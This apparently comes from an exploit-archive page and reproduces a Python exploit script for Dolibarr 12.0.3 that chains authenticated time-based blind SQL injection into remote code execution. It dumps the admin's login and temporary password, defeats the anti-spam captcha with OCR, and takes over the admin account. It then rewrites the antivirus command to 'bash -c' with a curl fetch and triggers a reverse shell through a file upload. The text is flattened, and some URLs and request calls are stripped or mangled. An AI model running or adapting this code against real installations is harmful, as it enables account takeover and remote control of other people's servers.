dolibarr 12.0.3 sqli to rce

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dolibarr 12.0.3 sqli to rce Code Code...
# Exploit Title: Dolibarr 12.0.3 - SQLi to RCE # Date: 2/12/2020 # Exploit Author: coiffeur # Write Up:, # Vendor Homepage: # Software Link:, # Version: 12.0.3 import argparse import binascii import random import re from io import BytesIO from urllib.parse import quote_plus as qp import bcrypt import pytesseract import requests from bs4 import BeautifulSoup from PIL import Image DELTA = None DEBUG = 1 SESSION = requests.session() TRESHOLD = 0.80 DELAY = 1 LIKE = "%_subscription" COLUMNS = ["login", "pass_temp"] def usage(): banner = """NAME: Dolibarr SQLi to RCE (authenticate) SYNOPSIS: python3 -t <BASE_URL> -u <USERNAME> -p <PAS= SWORD> EXAMPLE: python3 -t " .0.3/htdocs/" -u test -p test AUTHOR: coiffeur """ print(banner) exit(-1) def hex(text): return "0x" + binascii.hexlify(text.encode()).decode() def hash(password): salt = bcrypt.gensalt() hashed = bcrypt.hashpw(password.encode(), salt) return hashed.decode() def authenticate(url, username, password): datas = { "actionlogin": "login", "loginfunction": "loginfunction", "username": username, "password": password } r ="{url}index.php", data=datas, allow_redirects=False, verify=False) if r.status_code != 302: if DEBUG: print(f"[x] Authentication failed!") return 0 if DEBUG: print(f" [*] Authenticated as: {username}") return 1 def get_antispam_code(base_url): code = "" while len(code) != 5: r = SESSION.get(f"{base_url}core/antispamimage.php", verify=False) temp_image = f"/tmp/{random.randint(0000,9999)}" with open(temp_image, "wb") as f: f.write(r.content) with open(temp_image, "rb") as f: code = pytesseract.image_to_string("\n")[0] for char in code: if char not in "aAbBCDeEFgGhHJKLmMnNpPqQRsStTuVwWXYZz2345679": code = "" break return code def reset_password(url, login): for _ in range(5): code = get_antispam_code(url) headers = { "Referer": f"{url}user/passwordforgotten.php" } datas = { "action": "buildnewpassword", "username": login, "code": code } r ="{url}user/passwordforgotten.php", data=datas, headers=headers, verify=False) if r.status_code == 200: for response in [f"Request to change password for {login} sent = to", f"Demande de changement de mot de passe pour {login} envoy=C3=A9e"]: if r.text.find(response): if DEBUG: print(f" [*] Password reset using code: {code}") return 1 return 0 def change_password(url, login, pass_temp): r = requests.get(url=f"{url}user/passwordforgotten.php?action=val= idatenewpassword&username={qp(login)}&passwordhash={hash(pass_temp)}", allow_redirects=False, verify=False) if r.status_code == 302: if DEBUG: print(f" [*] Password changed: {pass_temp}") return 1 return 0 def change_binary(url, command, parameters): headers = { "Referer": f"{url}admin/security_file.php" } datas = { "action": "updateform", "MAIN_UPLOAD_DOC": "2048", "MAIN_UMASK": "0664", "MAIN_ANTIVIRUS_COMMAND": command, "MAIN_ANTIVIRUS_PARAM": parameters } r ="{url}admin/security_file.php", data=datas, headers=headers, verify=False) if r.status_code == 200: for response in ["Record modified successfully", "Enregistrement mo= difi=C3=A9 avec succ=C3=A8s"]: if response in r.text: if DEBUG: print(f" [*] Binary's path changed") return 1 return 0 def trigger_exploit(url): headers = { "Referer": f"{url}admin/security_file.php" } files = { "userfile[]": open("junk.txt", "rb"), } datas = { "sendit": "Upload" } if DEBUG: print(f" [*] Triggering reverse shell") r ="{url}admin/security_file.php", files=files, data=datas, headers=headers, verify=False) if r.status_code == 200: for response in ["File(s) uploaded successfully", "The antivirus pr= ogram was not able to validate the file (file might be infected by a virus)= ", "Fichier(s) t=C3=A9l=C3=A9vers=C3=A9s(s) avec succ=C3=A8s", "L'antivirus= n'a pas pu valider ce fichier (il est probablement infect=C3=A9 par un vir= us) !"]: if response in r.text: if DEBUG: print(f" [*] Exploit done") return 1 return 0 def get_version(url): r = SESSION.get(f"{url}index.php", verify=False) x = re.findall( r"Version Dolibarr [0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}", r.text) if x: version = x[0] if "12.0.3" in version: if DEBUG: print(f" [*] {version} (exploit should work)") return 1 if DEBUG: print(f"[*] Version may not be vulnerable") return 0 def get_privileges(url): r = SESSION.get(f"{url}index.php", verify=False) x = re.findall(r"id=\d", r.text) if x: id = x[0] if DEBUG: print(f" [*] id found: {id}") r = SESSION.get(f"{url}user/perms.php?{id}", verify=False) soup = BeautifulSoup(r.text, 'html.parser') for img in soup.find_all("img"): if img.get("title") in ["Actif", "Active"]: for td in img.parent.parent.find_all("td"): privileges = [ "Consulter les commandes clients", "Read customers = orders"] for privilege in privileges: if privilege in td: if DEBUG: print( f" [*] Check privileges: {privilege}= ") return 1 if DEBUG: print(f"[*] At the sight of the privileges, the exploit may fail") return 0 def check(url, payload): headers = { "Referer": f"{url}commande/stats/index.php?leftmenu=orders" } datas = {"object_status": payload} r ="{url}commande/stats/index.php", data=datas, headers=headers, verify=False) return r.elapsed.total_seconds() def evaluate_delay(url): global DELTA deltas = [] payload = f"IF(0<1, SLEEP({DELAY}), SLEEP(0))" for _ in range(4): deltas.append(check(url, payload)) DELTA = sum(deltas)/len(deltas) if DEBUG: print(f" [+] Delta: {DELTA}") def get_tbl_name_len(url): i = 0 while 1: payload = f"IF((SELECT LENGTH(table_name) FROM information_schema= .tables WHERE table_name LIKE {hex(LIKE)})>{i}, SLEEP(0), SLEEP({DELAY}))" if check(url, payload) >= DELTA*TRESHOLD: return i if i > 100: print(f"[x] Exploit failed") exit(-1) i += 1 def get_tbl_name(url, length): tbl_name = "" for i in range(1, length+1): min, max = 0, 127-1 while min < max: mid = (max + min) // 2 payload = f"IF((SELECT ASCII(SUBSTR(table_name,{i},1)) FROM i= nformation_schema.tables WHERE table_name LIKE {hex(LIKE)})<={mid}, SLEEP= ({DELAY}), SLEEP(0))" if check(url, payload) >= DELTA*TRESHOLD: max = mid else: min = mid + 1 tbl_name += chr(min) return tbl_name def get_elt_len(url, tbl_name, column_name): i = 0 while 1: payload = f"IF((SELECT LENGTH({column_name}) FROM {tbl_name} LIMI= T 1)>{i}, SLEEP(0), SLEEP({DELAY}))" if check(url, payload) >= DELTA*TRESHOLD: return i if i > 100: print(f"[x] Exploit failed") exit(-1) i += 1 def get_elt(url, tbl_name, column_name, length): elt = "" for i in range(1, length+1): min, max = 0, 127-1 while min < max: mid = (max + min) // 2 payload = f"IF((SELECT ASCII(SUBSTR({column_name},{i},1)) FRO= M {tbl_name} LIMIT 1)<={mid} , SLEEP({DELAY}), SLEEP(0))" if check(url, payload) >= DELTA*TRESHOLD: max = mid else: min = mid + 1 elt += chr(min) return elt def get_row(url, tbl_name): print(f" [*] Dump admin's infos from {tbl_name}") infos = {} for column_name in COLUMNS: elt_length = get_elt_len(url, tbl_name, column_name) infos[column_name] = get_elt(url, tbl_name, column_name, elt_leng= th) if DEBUG: print(f" [+] Infos: {infos}") return infos def main(url, username, password): # Check if exploit is possible print(f"[*] Requirements:") if not authenticate(url, username, password): print(f"[x] Exploit failed!") exit(-1) get_version(url) get_privileges(url) print(f"\n[*] Starting exploit:") # Evaluate delay evaluate_delay(url) print(f" [*] Extract prefix (using table: {LIKE})") tbl_name_len = get_tbl_name_len(url) tbl_name = get_tbl_name(url, tbl_name_len) prefix = f"{tbl_name.split('_')[0]}_" if DEBUG: print(f" [+] Prefix: {prefix}") # Dump admin's infos user_table_name = f"{prefix}user" infos = get_row(url, user_table_name) if not infos["login"]: print(f"[x] Exploit failed!") exit(-1) # Reset admin's passworrd if DEBUG: print(f" [*] Reseting {infos['login']}'s password") if not reset_password(url, infos["login"]): print(f"[x] Exploit failed!") exit(-1) infos = get_row(url, user_table_name) # Remove cookies to logout # Change admin's password # Login as admin SESSION.cookies.clear() if not change_password(url, infos['login'], infos['pass_temp']): print(f"[x] Exploit failed!") exit(-1) authenticate(url, infos['login'], infos['pass_temp']) # Change antivirus's binary path # Trigger reverse shell change_binary(url, "bash", '-c "$(curl"'= ) trigger_exploit(url) return 0 if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-t", help="Base URL of Dolibarr") parser.add_argument("-u", help="Username") parser.add_argument("-p", help="Password") args = parser.parse_args() if not args.t or not args.u or not args.p: usage() main(args.t, args.u, args.p)

Dolibarr 12.0.3 sqli to rce Vulnerability / Exploit Source : Dolibarr 12.0.3 sqli to rce

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